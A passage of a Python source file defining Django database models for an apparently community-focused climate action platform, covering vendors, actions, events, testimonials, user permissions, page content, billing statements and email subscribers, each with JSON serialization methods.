Vendor MOU, Reesearch is_verified: boolean When the checklist items are all done and verified then set this as True to confirm this vendor more_info: JSON any another dynamic information we would like to store about this Service created_at: DateTime The date and time that this Vendor was added created_at: DateTime The date and time of the last time any updates were made to the information about this Vendor """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, unique=True) phone_number = models.CharField(max_length=SHORT_STR_LEN, blank=True) email = models.EmailField(blank=True, null=True, db_index=True) description = models.CharField(max_length=LONG_STR_LEN, blank=True) logo = models.ForeignKey( Media, blank=True, null=True, on_delete=models.SET_NULL, related_name="vender_logo", ) banner = models.ForeignKey( Media, blank=True, null=True, on_delete=models.SET_NULL, related_name="vendor_banner", ) address = models.JSONField(blank=True, null=True) key_contact = models.JSONField(blank=True, null=True) service_area = models.CharField(max_length=SHORT_STR_LEN) service_area_states = models.JSONField(blank=True, null=True) services = models.ManyToManyField(Service, blank=True) properties_serviced = models.JSONField(blank=True, null=True) onboarding_date = models.DateTimeField(auto_now_add=True) onboarding_contact = models.ForeignKey( UserProfile, blank=True, null=True, on_delete=models.SET_NULL, related_name="onboarding_contact", ) verification_checklist = models.JSONField(blank=True, null=True) is_verified = models.BooleanField(default=False, blank=True) location = models.JSONField(blank=True, null=True) more_info = models.JSONField(blank=True, null=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) communities = models.ManyToManyField( Community, blank=True, related_name="community_vendors" ) tags = models.ManyToManyField(Tag, related_name="vendor_tags", blank=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def info(self): data = model_to_dict( self, ["id", "name", "service_area", "key_contact", "phone_number", "email"] ) data["logo"] = get_json_if_not_none(self.logo) return data def simple_json(self): data = model_to_dict( self, exclude=[ "logo", "banner", "services", "onboarding_contact", "more_info", "services", "communities", ], ) data["services"] = [s.simple_json() for s in self.services.all()] data["communities"] = [c.simple_json() for c in self.communities.all()] data["tags"] = [t.simple_json() for t in self.tags.all()] data["logo"] = get_json_if_not_none(self.logo) data["website"] = self.more_info and self.more_info.get("website", None) data["key_contact"] = self.key_contact return data def full_json(self): data = model_to_dict( self, exclude=["logo", "banner", "services", "onboarding_contact"] ) data["onboarding_contact"] = get_json_if_not_none(self.onboarding_contact) data["logo"] = get_json_if_not_none(self.logo) data["more_info"] = self.more_info data["tags"] = [t.simple_json() for t in self.tags.all()] data["banner"] = get_json_if_not_none(self.banner) data["services"] = [s.simple_json() for s in self.services.all()] data["communities"] = [c.simple_json() for c in self.communities.all()] data["website"] = self.more_info and self.more_info.get("website", None) data["key_contact"] = self.key_contact data["location"] = self.location return data class Meta: db_table = "vendors" 
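# Illustrative usage sketch (not part of the original models): how the info()/
# simple_json()/full_json() serializers above are typically consumed when building
# a community's vendor listing. The variable name `community` is hypothetical; the
# filters only use fields defined on Vendor (communities, is_published, is_deleted).
#
#   published = Vendor.objects.filter(
#       communities=community, is_published=True, is_deleted=False
#   )
#   listing = [v.simple_json() for v in published]   # lightweight list view
#   detail = published.first().full_json() if published.exists() else None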
class Action(models.Model): """ A class used to represent an Action that can be taken by a user on this website. Attributes ---------- title : str A short title for this Action. is_global: boolean True if this action is a core action that every community should see or not. False otherwise. about: str More descriptive information about this action. steps_to_take: str Describes the steps that can be taken by an a user for this action; icon: str a string description of the icon class for this action if any image: int Media a Foreign key to an uploaded media file average_carbon_score: the average carbon score for this action as given by the carbon calculator geographic_area: str the Location where this action can be taken created_at: DateTime The date and time that this real estate unity was added created_at: DateTime The date and time of the last time any updates were made to the information about this real estate unit """ id = models.AutoField(primary_key=True) title = models.CharField(max_length=SHORT_STR_LEN, db_index=True) is_global = models.BooleanField(default=False, blank=True) featured_summary = models.TextField(max_length=LONG_STR_LEN, blank=True, null=True) steps_to_take = models.TextField(max_length=LONG_STR_LEN, blank=True) deep_dive = models.TextField(max_length=LONG_STR_LEN, blank=True) about = models.TextField(max_length=LONG_STR_LEN, blank=True) # TODO: this wasn't fully implemented - may remove primary_category # this is the singal category which points will be recorded in, though primary_category = models.ForeignKey( Tag, related_name="action_category", on_delete=models.SET_NULL, null=True ) # then - an action could have multiple secondary categories tags = models.ManyToManyField(Tag, related_name="action_tags", blank=True) geographic_area = models.JSONField(blank=True, null=True) icon = models.CharField(max_length=SHORT_STR_LEN, blank=True) image = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="actions" ) properties = models.ManyToManyField(ActionProperty, blank=True) vendors = models.ManyToManyField(Vendor, blank=True) calculator_action = models.ForeignKey( CCAction, blank=True, null=True, on_delete=models.SET_NULL ) average_carbon_score = models.TextField(max_length=SHORT_STR_LEN, blank=True) community = models.ForeignKey( Community, on_delete=models.SET_NULL, null=True, blank=True, db_index=True ) rank = models.PositiveSmallIntegerField(default=0, blank=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.title def info(self): return model_to_dict(self, ["id", "title"]) def simple_json(self): data = model_to_dict( self, [ "id", "is_published", "is_deleted", "title", "is_global", "icon", "rank", "average_carbon_score", "featured_summary", ], ) data["image"] = get_json_if_not_none(self.image) data["calculator_action"] = get_summary_info(self.calculator_action) data["tags"] = [t.simple_json() for t in self.tags.all()] data["steps_to_take"] = self.steps_to_take data["deep_dive"] = self.deep_dive data["about"] = self.about data["community"] = get_summary_info(self.community) data["vendors"] = [v.info() for v in self.vendors.all()] return data def full_json(self): data = self.simple_json() data["is_global"] = self.is_global data["steps_to_take"] = self.steps_to_take data["about"] = self.about data["geographic_area"] = 
self.geographic_area data["properties"] = [p.simple_json() for p in self.properties.all()] data["vendors"] = [v.simple_json() for v in self.vendors.all()] return data class Meta: ordering = ["rank", "title"] db_table = "actions" unique_together = [["title", "community"]] class Event(models.Model): """ A class used to represent an Event. Attributes ---------- name : str name of the event description: str more details about this event start_date_and_time: Datetime when the event starts (both the day and time) end_date_and_time: Datetime when the event ends location: Location where the event is taking place tags: ManyToMany tags on this event to help in easily filtering image: Media Foreign key linking to the image attached to this event. archive: boolean True if this event should be archived is_global: boolean True if this action is an event that every community should see or not. False otherwise. is_recurring: boolean if the event is recurring, this value is True and it has a RecurringPattern instance attached to it. recurring_details: JSON stores information about the recurrence pattern of the event if is_recurring = True """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) featured_summary = models.TextField(max_length=LONG_STR_LEN, blank=True, null=True) description = models.TextField(max_length=LONG_STR_LEN) community = models.ForeignKey(Community, on_delete=models.CASCADE, null=True) invited_communities = models.ManyToManyField( Community, related_name="invited_communites", blank=True ) start_date_and_time = models.DateTimeField(db_index=True) end_date_and_time = models.DateTimeField(db_index=True) location = models.JSONField(blank=True, null=True) tags = models.ManyToManyField(Tag, blank=True) image = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="events" ) archive = models.BooleanField(default=False, blank=True) is_global = models.BooleanField(default=False, blank=True) external_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) is_external_event = models.BooleanField(default=False, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) rank = models.PositiveIntegerField(default=0, blank=True, null=True) is_recurring = models.BooleanField(default=False, blank=True, null=True) recurring_details = models.JSONField(blank=True, null=True) def __str__(self): return self.name def simple_json(self): data = model_to_dict( self, exclude=["tags", "image", "community", "invited_communities"] ) data["start_date_and_time"] = self.start_date_and_time data["end_date_and_time"] = self.end_date_and_time data["tags"] = [t.simple_json() for t in self.tags.all()] data["community"] = get_json_if_not_none(self.community) data["image"] = None if not self.image else self.image.full_json() data["invited_communities"] = [ c.simple_json() for c in self.invited_communities.all() ] data["more_info"] = self.more_info return data def full_json(self): return self.simple_json() class Meta: ordering = ( "rank", "-start_date_and_time", ) db_table = "events" # leaner class that stores information about events that have already passed # in the future, can use this class to revive events that may have been archived class PastEvent(models.Model): id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) description = models.TextField(max_length=LONG_STR_LEN) 
start_date_and_time = models.DateTimeField() community = models.ForeignKey(Community, on_delete=models.CASCADE) class RecurringEventException(models.Model): """ A class used to represent a RESCHEDULING of a recurring event. Attributes ---------- event: Event stores the recurring event that the exception is attached to rescheduled_event: Event if the event instance is rescheduled, a new Event is created representing the rescheduled event instance is_cancelled : boolean True if the event has been cancelled by CAdmin is_rescheduled: boolean True if event has been rescheduled by CAdmin former_time: dateTime Tells us when the instance was originally scheduled. Helps us figure out when to delete RecurringEventException """ id = models.AutoField(primary_key=True) event = models.ForeignKey( Event, on_delete=models.CASCADE, related_name="recurring_event" ) rescheduled_event = models.ForeignKey( Event, on_delete=models.CASCADE, blank=True, null=True ) # shouldnt be this way - blank should be false, but I don't know what to set the default to former_time = models.DateTimeField(null=True, blank=True) def __str__(self): return str(self.id) def simple_json(self): data = model_to_dict(self, exclude=["event", "rescheduled_event"]) data["id"] = str(self.id) data["former_time"] = str(self.former_time) data["event"] = self.event.id data["rescheduled_start_time"] = str(self.rescheduled_event.start_date_and_time) data["rescheduled_end_time"] = str(self.rescheduled_event.end_date_and_time) return data class EventAttendee(models.Model): """ A class used to represent events and attendees Attributes ---------- user : Foreign Key of the User Which user this applies to status: str Tells if the user is just interested, RSVP-ed or saved for later. event: int Foreign Key to event that the user has responded to. """ id = models.AutoField(primary_key=True) user = models.ForeignKey(UserProfile, on_delete=models.CASCADE) event = models.ForeignKey(Event, on_delete=models.CASCADE) status = models.CharField( max_length=TINY_STR_LEN, choices=CHOICES.get("EVENT_CHOICES", {}).items() ) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return "%s | %s | %s" % (self.user, self.status, self.event) def simple_json(self): data = model_to_dict(self, ["id", "status"]) data["user"] = self.user.info() data["event"] = self.event.info() return data def full_json(self): return self.simple_json() class Meta: verbose_name_plural = "Event Attendees" db_table = "event_attendees" unique_together = [["user", "event"]] class Permission(models.Model): """ A class used to represent Permission(s) that are required by users to perform any tasks on this platform. Attributes ---------- name : str name of the Vendor """ id = models.AutoField(primary_key=True) name = models.CharField( max_length=TINY_STR_LEN, choices=CHOICES.get("PERMISSION_TYPES", {}).items(), db_index=True, ) description = models.TextField(max_length=LONG_STR_LEN, blank=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return CHOICES.get("PERMISSION_TYPES", {})[self.name] def simple_json(self): return model_to_dict(self) def full_json(self): return self.simple_json() class Meta: ordering = ("name",) db_table = "permissions" class UserPermissions(models.Model): """ A class used to represent Users and what they can do. 
Attributes ---------- who : int the user on this site can_do: int Foreign Key desscribing the policy that they can perform """ id = models.AutoField(primary_key=True) who = models.ForeignKey(Role, on_delete=models.CASCADE) can_do = models.ForeignKey(Permission, on_delete=models.CASCADE) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return "(%s) can (%s)" % (self.who, self.can_do) def simple_json(self): return { "id": self.id, "who": get_json_if_not_none(self.who), "can_do": get_json_if_not_none(self.can_do), } def full_json(self): return self.simple_json() class Meta: ordering = ("who",) db_table = "user_permissions" class Testimonial(models.Model): """ A class used to represent a Testimonial shared by a user. Attributes ---------- title : str title of the testimony body: str (HTML) more information for this testimony. is_approved: boolean after the community admin reviews this, he can check the box """ id = models.AutoField(primary_key=True) title = models.CharField(max_length=SHORT_STR_LEN, db_index=True) body = models.TextField(max_length=LONG_STR_LEN) is_approved = models.BooleanField(default=False, blank=True) tags = models.ManyToManyField(Tag, blank=True) image = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="testimonials", ) user = models.ForeignKey( UserProfile, on_delete=models.CASCADE, db_index=True, null=True ) action = models.ForeignKey( Action, on_delete=models.CASCADE, null=True, db_index=True ) vendor = models.ForeignKey( Vendor, on_delete=models.SET_NULL, null=True, blank=True, db_index=True ) community = models.ForeignKey( Community, on_delete=models.CASCADE, blank=True, null=True, db_index=True ) rank = models.PositiveSmallIntegerField(default=0) created_at = models.DateTimeField(auto_now_add=True, blank=True) updated_at = models.DateTimeField(auto_now=True, blank=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) anonymous = models.BooleanField(default=False, blank=True) preferred_name = models.CharField(max_length=SHORT_STR_LEN, blank=True, null=True) other_vendor = models.CharField(max_length=SHORT_STR_LEN, blank=True, null=True) def __str__(self): return self.title def info(self): return model_to_dict(self, fields=["id", "title", "community"]) def _get_user_info(self): return get_json_if_not_none(self.user) or { "full_name": "User unknown", "email": "e-mail address not provided", } def simple_json(self): res = model_to_dict(self, exclude=["image", "tags"]) res["user"] = self._get_user_info() res["action"] = get_json_if_not_none(self.action) res["vendor"] = None if not self.vendor else self.vendor.info() res["community"] = get_json_if_not_none(self.community) res["created_at"] = self.created_at.date() res["file"] = get_json_if_not_none(self.image) res["tags"] = [t.simple_json() for t in self.tags.all()] res["anonymous"] = self.anonymous res["preferred_name"] = self.preferred_name res["other_vendor"] = self.other_vendor return res def full_json(self): data = self.simple_json() data["image"] = data.get("file", None) data["tags"] = [t.simple_json() for t in self.tags.all()] return data class Meta: ordering = ("rank",) db_table = "testimonials" class UserActionRel(models.Model): """ A class used to represent a user and his/her relationship with an action. 
Whether they marked an action as todo, done, etc Attributes ---------- user : int Foreign Key for user real_estate_unit: Foreign key for the real estate unit this action is related to. action: int which action they marked vendor: which vendor they choose to contact/connect with status: Whether they marked it as todo, done or save for later date_completed: If specified, the date when they completed the action carbon_impact: Carbon reduction calculated by the Carbon Calculator """ id = models.AutoField(primary_key=True) user = models.ForeignKey(UserProfile, on_delete=models.CASCADE, db_index=True) real_estate_unit = models.ForeignKey(RealEstateUnit, on_delete=models.CASCADE) action = models.ForeignKey(Action, on_delete=models.CASCADE) vendor = models.ForeignKey(Vendor, on_delete=models.SET_NULL, null=True, blank=True) status = models.CharField( max_length=SHORT_STR_LEN, choices=CHOICES.get("USER_ACTION_STATUS", {}).items(), db_index=True, default="TODO", ) date_completed = models.DateField(blank=True, null=True) carbon_impact = models.IntegerField( default=0 ) # that which was calculated by the Carbon Calculator created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) def simple_json(self): return { "id": self.id, "user": get_json_if_not_none(self.user), "action": get_json_if_not_none(self.action), "real_estate_unit": get_json_if_not_none(self.real_estate_unit), "status": self.status, "date_completed": self.date_completed, "carbon_impact": self.carbon_impact, } def full_json(self): res = self.simple_json() res["vendor"] = get_json_if_not_none(self.vendor) return res def __str__(self): return "%s | %s | (%s)" % (self.user, self.status, self.action) class Meta: ordering = ("status", "user", "action") unique_together = [["user", "action", "real_estate_unit"]] class CommunityAdminGroup(models.Model): """ This represents a binding of a group of users and a community for which they are admin for. Attributes ---------- name : str name of the page section info: JSON dynamic information goes in here """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, unique=True, db_index=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, blank=True) members = models.ManyToManyField(UserProfile, blank=True) is_deleted = models.BooleanField(default=False, blank=True) pending_admins = models.JSONField(blank=True, null=True) def __str__(self): return self.name def simple_json(self): res = model_to_dict(self, exclude=["members"]) res["community"] = get_json_if_not_none(self.community) res["members"] = [m.simple_json() for m in self.members.all()] return res def full_json(self): return self.simple_json() class Meta: ordering = ("name",) db_table = "community_admin_group" class UserGroup(models.Model): """ This represents a binding of a group of users and a community and the permissions they have. 
Attributes ---------- name : str name of the page section info: JSON dynamic information goes in here """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, unique=True, db_index=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) community = models.ForeignKey( Community, on_delete=models.CASCADE, blank=True, db_index=True ) members = models.ManyToManyField(UserProfile, blank=True) permissions = models.ManyToManyField(Permission, blank=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return model_to_dict(self, exclude=["members", "permissions"]) def full_json(self): data = self.simple_json() data["community"] = get_json_if_not_none(self.community) data["members"] = [m.simple_json() for m in self.members.all()] data["permissions"] = [p.simple_json() for p in self.permissions.all()] return data class Meta: ordering = ("name",) db_table = "user_groups" class Data(models.Model): """Instances of data points Attributes ---------- name : str name of the statistic value: decimal The value of the statistic goes here info: JSON dynamic information goes in here. The symbol and other info goes here community: int foreign key linking a community to this statistic """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, db_index=True) value = models.PositiveIntegerField(default=0) reported_value = models.PositiveIntegerField(default=0) denominator = models.CharField(max_length=SHORT_STR_LEN, blank=True) symbol = models.CharField(max_length=LONG_STR_LEN, blank=True) tag = models.ForeignKey( Tag, blank=True, on_delete=models.CASCADE, null=True, db_index=True ) community = models.ForeignKey( Community, blank=True, on_delete=models.SET_NULL, null=True, db_index=True ) info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) def __str__(self): return "%s | %s (%d) |(%s)" % (self.community, self.name, self.value, self.tag) def simple_json(self): return model_to_dict(self, fields=["id", "name", "value", "reported_value"]) def full_json(self): data = self.simple_json() data["tag"] = get_json_if_not_none(self.tag) data["community"] = get_json_if_not_none(self.community) return data class Meta: verbose_name_plural = "Data" ordering = ("name", "value") db_table = "data" class Graph(models.Model): """Instances keep track of a statistic from the admin Attributes ---------- title : str the title of this graph type: str the type of graph to be plotted eg. 
pie chart, bar chart etc data: JSON data to be plotted on this graph """ id = models.AutoField(primary_key=True) title = models.CharField(max_length=LONG_STR_LEN, db_index=True) graph_type = models.CharField( max_length=TINY_STR_LEN, choices=CHOICES.get("GRAPH_TYPES", {}).items() ) community = models.ForeignKey( Community, on_delete=models.SET_NULL, null=True, blank=True ) data = models.ManyToManyField(Data, blank=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def simple_json(self): return model_to_dict(self, fields=["title", "community", "is_published"]) def full_json(self): res = self.simple_json() res["data"] = [d.simple_json() for d in self.data.all()] return res def __str__(self): return self.title class Meta: verbose_name_plural = "Graphs" ordering = ("title",) class Button(models.Model): """Buttons on the pages""" text = models.CharField(max_length=SHORT_STR_LEN, blank=True) icon = models.CharField(max_length=SHORT_STR_LEN, blank=True) url = models.CharField(max_length=SHORT_STR_LEN, blank=True) color = models.CharField(max_length=SHORT_STR_LEN, blank=True) info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) def __str__(self): return self.text def simple_json(self): return model_to_dict(self) def full_json(self): return self.simple_json() class Meta: ordering = ("text",) class SliderImage(models.Model): """Model the represents the database for Images that will be inserted into slide shows Attributes ---------- title : str title of the page section subtitle: str sub title for this image as should appear on the slider buttons: JSON a json list of buttons with each containing text, link, icon, color etc """ id = models.AutoField(primary_key=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True, db_index=True) subtitle = models.CharField(max_length=LONG_STR_LEN, blank=True) image = models.ForeignKey(Media, on_delete=models.SET_NULL, null=True, blank=True) buttons = models.ManyToManyField(Button, blank=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return self.title def simple_json(self): return { "id": self.id, "title": self.title, "image": get_json_if_not_none(self.image), } def full_json(self): res = self.simple_json() res["buttons"] = [b.simple_json() for b in self.buttons.all()] return res class Meta: verbose_name_plural = "Slider Images" db_table = "slider_images" class Slider(models.Model): """ Model that represents a model for a slider/carousel on the website Attributes ---------- name : str name of the page section description: str a description of this slider info: JSON dynamic information goes in here """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=LONG_STR_LEN, blank=True, db_index=True) description = models.CharField(max_length=LONG_STR_LEN, blank=True) slides = models.ManyToManyField(SliderImage, blank=True) is_global = models.BooleanField(default=False, blank=True) community = models.ForeignKey( Community, on_delete=models.CASCADE, null=True, blank=True ) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return { "id": self.id, "name": self.name, "description": self.description, } def full_json(self): res = self.simple_json() res["slides"] = [s.full_json() for s in 
            self.slides.all()]
        return res


class Menu(models.Model):
    """Represents items on the menu/navigation bar (top-most bar on the webpage)

    Attributes
    ----------
    name : str
        name of the menu
    content: JSON
        the content is represented as a json
    """

    id = models.AutoField(primary_key=True)
    name = models.CharField(max_length=LONG_STR_LEN, unique=True)
    content = models.JSONField(blank=True, null=True)
    is_deleted = models.BooleanField(default=False, blank=True)
    is_published = models.BooleanField(default=False, blank=True)

    def __str__(self):
        return self.name

    def simple_json(self):
        return model_to_dict(self)

    def full_json(self):
        return self.simple_json()

    class Meta:
        ordering = ("name",)


class Card(models.Model):
    """Cards on the pages"""

    title = models.CharField(max_length=SHORT_STR_LEN, blank=True)
    description = models.TextField(max_length=LONG_STR_LEN, blank=True)
    icon = models.CharField(max_length=SHORT_STR_LEN, blank=True)
    link = models.CharField(max_length=SHORT_STR_LEN, blank=True)
    media = models.ForeignKey(Media, blank=True, on_delete=models.SET_NULL, null=True)
    is_deleted = models.BooleanField(default=False, blank=True)
    is_published = models.BooleanField(default=True)

    def __str__(self):
        return self.title

    def simple_json(self):
        return {
            "title": self.title,
            "description": self.description,
            "icon": self.icon,
            "link": self.link,
            "media": get_json_if_not_none(self.media),
        }

    def full_json(self):
        return self.simple_json()

    class Meta:
        ordering = ("title",)


class PageSection(models.Model):
    """
    A class used to represent a PageSection
    #TODO: what about page sections like a gallery, slideshow, etc?

    Attributes
    ----------
    name : str
        name of the page section
    info: JSON
        dynamic information goes in here
    """

    id = models.AutoField(primary_key=True)
    name = models.CharField(max_length=SHORT_STR_LEN)
    title = models.CharField(max_length=SHORT_STR_LEN, blank=True)
    description = models.TextField(max_length=LONG_STR_LEN, blank=True)
    image = models.ForeignKey(Media, on_delete=models.SET_NULL, null=True, blank=True)
    cards = models.ManyToManyField(Card, blank=True)
    buttons = models.ManyToManyField(Button, blank=True)
    slider = models.ForeignKey(Slider, on_delete=models.SET_NULL, null=True, blank=True)
    graphs = models.ManyToManyField(Graph, blank=True, related_name="graphs")
    info = models.JSONField(blank=True, null=True)
    is_deleted = models.BooleanField(default=False, blank=True)
    is_published = models.BooleanField(default=False, blank=True)

    def __str__(self):
        return self.name

    def simple_json(self):
        return model_to_dict(self, ["id", "name", "title", "description"])

    def full_json(self):
        res = self.simple_json()
        res["image"] = get_json_if_not_none(self.image)
        res["cards"] = [c.simple_json() for c in self.cards.all()]
        res["buttons"] = [b.simple_json() for b in self.buttons.all()]
        res["slider"] = get_json_if_not_none(self.slider, True)
        res["graphs"] = [g.full_json() for g in self.graphs.all()]
        res["info"] = self.info
        return res


class Page(models.Model):
    """
    A class used to represent a Page on a community portal eg. The home page, about-us page, etc

    Attributes
    ----------
    title : str
        title of the page
    description: str
        the description of the page
    community: int
        Foreign key for which community this page is linked to
    sections: ManyToMany
        all the different parts/sections that go on this page
    content: JSON
        dynamic info for this page goes here.
""" id = models.AutoField(primary_key=True) name = models.CharField(max_length=LONG_STR_LEN, db_index=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) sections = models.ManyToManyField(PageSection, blank=True) info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return f"{self.name} - {self.community.name}" def simple_json(self): res = model_to_dict(self, ["id", "name", "description"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() res["sections"] = [s.full_json() for s in self.sections.all()] res["info"] = self.info return res class Meta: unique_together = [["name", "community"]] class BillingStatement(models.Model): """ A class used to represent a Billing Statement Attributes ---------- name : str name of the statement. amount: decimal the amount of money owed description: the breakdown of the bill for this community community: int Foreign Key to the community to whom this bill is associated. start_date: Datetime the start date from which the charges were incurred end_date: the end date up to which this charge was incurred. more_info: JSON dynamic information goes in here """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) amount = models.CharField(max_length=SHORT_STR_LEN, default="0.0") description = models.TextField(max_length=LONG_STR_LEN, blank=True) start_date = models.DateTimeField(blank=True, db_index=True) end_date = models.DateTimeField(blank=True) more_info = models.JSONField(blank=True, null=True) community = models.ForeignKey( Community, on_delete=models.SET_NULL, null=True, db_index=True ) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): res = model_to_dict(self, exclude=["community"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): return self.simple_json() class Meta: ordering = ("name",) db_table = "billing_statements" class Subscriber(models.Model): """ A class used to represent a subscriber / someone who wants to join the massenergize mailist Attributes ---------- name : str name of the statement. """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) email = models.EmailField(blank=False, db_index=True) community = models.ForeignKey( Community, on_delete=models.SET_NULL, null=True, db_index=True ) created_at = models.DateTimeField(auto_now_add=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): res = model_to_dict(self) res["community"] = None if not self.community else self.community.info() return res def full_json(self): return self.simple_json() class Meta: db_table = "subscribers" unique_together = [["email", "community"]] class EmailCategory(models.Model): """ A class tha represents an email preference that a user or subscriber can subscribe to. 
Attributes ---------- name : str the name for this email preference community: int Foreign Key to the community this email category is associated with is_global: boolean True if this email category should appear in all the communities """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, db_index=True) community = models.ForeignKey(Community, db_index=True, on_delete=models.CASCADE) is_global = models.BooleanField(default=False, blank=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return model_to_dict(self) def full_json(self): res = self.simple_json() res["community"] = get_json_if_not_none(self.community) return res class Meta: db_table = "email_categories" unique_together = [["name", "community"]] verbose_name_plural = "Email Categories" class SubscriberEmailPreference(models.Model): """ Represents the email preferences of each subscriber. For a subscriber might want marketing emails but not promotion emails etc Attributes ---------- subscriber: int Foreign Key to a subscriber email_category: int Foreign key to an email category """ id = models.AutoField(primary_key=True) subscriber = models.ForeignKey(Subscriber, on_delete=models.CASCADE, db_index=True) subscribed_to = models.ForeignKey(EmailCategory, on_delete=models.CASCADE) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return "%s - %s" % (self.subscriber, self.subscribed_to) def simple_json(self): return { "id": self.id, "subscriber": get_json_if_not_none(self.subscriber), "subscribed_to": get_json_if_not_none(self.subscribed_to), } def full_json(self): return self.simple_json() class Meta: db_table = "subscriber_email_preferences" class PageSettings(models.Model): """ Represents the basic page settings. This is a base class, which contains common attributes to most page settings. 
Attributes ---------- Community: Foreign key: Which community this applies to title: str Title of the page (if different than default) sub_title: str Sub-title or tag-line of the page (if different than default) description: str Description of the page (if different than default) images: ForeignKeys: Links to one or more Media records featured_video_link: str A link to a featured video (on YouTube or elsewhere) more_info: JSON - extraneous information is_deleted: boolean - whether this page was deleted from the platform (perhaps with it's community) is_published: boolean - whether this page is live is_template: boolean - whether this is a template to be copied """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, blank=True) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) is_template = models.BooleanField(default=False, blank=True) def simple_json(self): res = model_to_dict(self, exclude=["images"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() res["images"] = [i.simple_json() for i in self.images.all()] return res class Meta: abstract = True class HomePageSettings(models.Model): """ Represents the community's Home page settings. Attributes ---------- Community: Foreign key: Which community this applies to title: str Title of the page (if different than default) sub_title: str Sub-title or tag-line of the page (if different than default) description: str Description of the page (if different than default) images: ForeignKeys: Links to one or more Media records featured_video_link: str A link to a featured video (on YouTube or elsewhere) specific to home page: ---------------------- featured_links : JSON - links to page redirects for the big buttons featured_events : links to one or more Event records featured_stats : lins to one or more Data records show_featured_events : boolean - whether to show featured events section show_featured_stats : boolean - whether to show featured stats section show_featured_links : boolean - whether to show featured links section show_featured_video : boolean - whether to show featured video featured_stats_description : str - descriptive text on what the stats are about featured_events_description : str - descriptive text on the featured events specific to the footer on all pages: ------------------------------------ show_footer_subscribe : Boolean - whether to show newsletter subscribe box show_footer_social_media : Boolean - whether to show footer social media icons social_media_links: str Links to social media, such as: ["facebook:www.facebook.com/coolerconcord/,instgram:www.instagram.com/coolerconcord/"] more_info: JSON - extraneous information is_deleted: boolean - whether this page was deleted from the platform (perhaps with it's community) is_published: boolean - whether this page is live is_template: boolean - whether this is a template to be copied """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = 
